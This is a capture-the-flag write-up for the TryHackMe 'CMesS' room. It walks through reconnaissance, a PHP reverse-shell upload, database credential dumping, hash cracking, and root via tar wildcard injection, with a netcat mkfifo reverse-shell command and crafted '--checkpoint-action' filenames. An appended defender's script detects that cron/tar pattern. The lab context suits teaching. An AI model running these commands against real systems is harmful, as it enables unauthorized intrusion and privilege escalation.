CMesS — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my CMesS— TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan for open ports with nmap:
nmap -A -p- -T4 -v <ip>
There are two open ports: 22 (SSH) and 80 (HTTP). First, add cmess.thm to your /etc/hosts and then access the website.
Next, scan for hidden directories using gobuster:
gobuster dir -u <ip>:80 -w /path-to-wordlist
Well, there are many hidden directories here! Let's enumerate them one by one.
There's not much I could find in these hidden directories. Let's start fuzzing subdomains, as the hint suggests. I will use a tool called wfuzz with this wordlist:
wfuzz -c -f cmess.txt -w /seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm/" -H "Host: FUZZ.cmess.thm" --hw 290
After wfuzz has finished, cat cmess.txt to see the result:
Now I've got the subdomain: dev
So let's add this subdomain (dev.cmess.thm) to /etc/hosts and access it.
Now I've got the credentials to log in: andre@cmess.thm : KPFTN_f2yxe%
Access cmess.thm/admin to log in and you will be in the admin dashboard:
Then, go to Content -> File Manager -> config.php to look for sensitive credentials.
After that, navigate to Content -> File Manager and upload the reverse shell.
Start a listener on your machine:
nc -lvnp 4444
Then open cmess.thm/assets/php-reverse-shell.php in the browser and you will catch a shell!
Spawn a TTY shell for stability using python:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
At this point I cannot read the first flag in andre's home folder due to permissions. But I can log in to MySQL using the credentials from config.php above:
mysql -u root -p
Enter the password above and you can access the database!
Look around for andre's password: it is stored in the user table of the gila database.
Enter the following commands in this order to show the databases, switch to gila, list its tables and dump user:
show databases;
use gila;
show tables;
select * from user;
It’s a bcrypt hash. Crack this hash to get andre’s password using hashcat:
hashcat -a 0 -w 3 -m 3200 -O andre.txt rockyou.txt
Bcrypt takes a very long time to crack, so be patient! However, after a long wait, I found I had gone down a rabbit hole! 😔 The password I recovered is the same one andre uses to log in to the website!
Let's try another way. cd to /tmp to see if there is anything interesting there.
Well, there is a backup tar here! Let's transfer this file to our machine. Start an HTTP server using python on the target:
python -m http.server 9000
On your machine:
wget http://<ip>:9000/andre_backup.tar.gz
Then, extract this file.
tar -xvf andre_backup.tar.gz
Well, there is a note file. Let's see what's inside:
Looks like there is a cron job that backs something up into this file. It will be used for privilege escalation, but not yet!
So, this time I will use LinEnum.sh to enumerate information on this machine. You can transfer the script to the target machine again using python and wget as above.
After the script has finished, I found an interesting hidden file in /opt: .password.bak
Let’s see its content:
Yas! Now I’ve got andre’s password! su to andre and get the first flag:
Now it's time for privilege escalation to own root. I already know there is a cron job backing something up. There's a backup folder inside andre's home, so let's see what's inside.
So, the backup cronjob will extract the tar file in /tmp to this backup folder.
To make sure, run cat /etc/crontab:
So I will abuse tar to spawn a root shell for us. This technique is called wildcard injection; you can read more about it here. Because the cron job runs as root, the shell will be root too!
First, use msfvenom to generate a netcat reverse shell command:
msfvenom -p cmd/unix/reverse_netcat lhost=<your-VPN-ip> lport=5555 R
Then, copy everything in the red box. Return to the target machine, run the following commands in /backup:
echo "mkfifo /tmp/cmfs; nc <your-VPN-ip> 5555 0</tmp/cmfs | /bin/sh >/tmp/cmfs 2>&1; rm /tmp/cmfs" > shell.sh
echo " " > "--checkpoint-action=exec=sh shell.sh"
echo " " > --checkpoint=1
Then, start a listener on port 5555:
nc -lvnp 5555
Now I’ve got the root shell! Get the final flag in /root.
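As an added defender's note, not part of the original writeup: the job above is exploitable only because the shell expands `*` into tar's argument list. The script below (my own example, built on a constructed temp directory and a constructed crontab snippet, assuming nothing about the real machine) counts option-like filenames in a backup directory, flags cron lines that run tar on a bare glob, and shows the safe invocation that keeps such names as plain archive members.

```shell
#!/bin/sh
# Added example, not from the original writeup: a defender's check for the
# tar wildcard-injection pattern, plus the safe way to write the backup job.
# It runs entirely on a constructed temp directory and a constructed crontab
# snippet; nothing below assumes the real machine's paths or cron entries.

# Count names in DIR that a shell glob would hand to tar as options
# (anything beginning with "-"). Always exits 0 so it is safe under set -e.
count_option_like_names() {
    n=0
    for f in "$1"/*; do
        name=${f##*/}                      # strip the directory prefix
        case "$name" in -*) n=$((n + 1)) ;; esac
    done
    echo "$n"
}

# Print crontab lines (with line numbers) that run tar on a bare "*": the
# shell expands the glob, so "--checkpoint-action=..." becomes a tar option.
crontab_tar_glob_lines() {
    grep -n 'tar .*[[:space:]]\*' "$1" | grep -v '^[0-9]*:#'
}

# Safe form: archive "." relative to DIR. A single literal path is never
# glob-expanded, so file names can only be archive members, never options.
safe_tar_create() {
    tar -cf "$1" -C "$2" .
}

# Constructed demo data: a backup directory holding the two file names used
# in the writeup, and a crontab with one vulnerable and one safe tar job.
demo_dir=$(mktemp -d)
demo_archive="$demo_dir.tar"
demo_crontab="$demo_dir.crontab"
printf 'hello\n' > "$demo_dir/notes.txt"
: > "$demo_dir/--checkpoint=1"
: > "$demo_dir/--checkpoint-action=exec=sh shell.sh"
cat > "$demo_crontab" <<'EOF'
# m h dom mon dow user command
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
0 3 * * * root tar -zcf /tmp/etc_backup.tar.gz -C /etc .
EOF

echo "option-like names in backup dir: $(count_option_like_names "$demo_dir")"
echo "cron jobs running tar on a bare glob:"
crontab_tar_glob_lines "$demo_crontab"
safe_tar_create "$demo_archive" "$demo_dir"   # names land inside the archive
```

Listing the resulting archive with `tar -tf` shows `./--checkpoint=1` as an ordinary member, which is exactly what the `-C DIR .` form guarantees.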
The end.
HAPPY HACKING